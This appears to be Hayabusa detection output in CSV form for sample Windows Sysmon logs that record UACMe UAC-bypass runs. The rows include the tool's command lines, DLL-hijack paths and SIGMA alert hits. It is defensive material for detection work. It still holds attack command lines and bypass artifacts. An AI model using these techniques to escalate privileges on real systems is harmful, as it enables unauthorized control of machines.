+2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:19.888 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 747F3D96-7935-5D45-0000-001066CA0701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.524 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 747F3D96-7937-5D45-0000-00100D290801,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:25.165 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:31:27.683 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 747F3D96-7EE2-5D45-0000-0010F19E2801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:38.640 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 747F3D96-7EF1-5D45-0000-0010DDBF2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 21:32:49.525 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:26.782 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.101 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-03 22:50:29.461 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
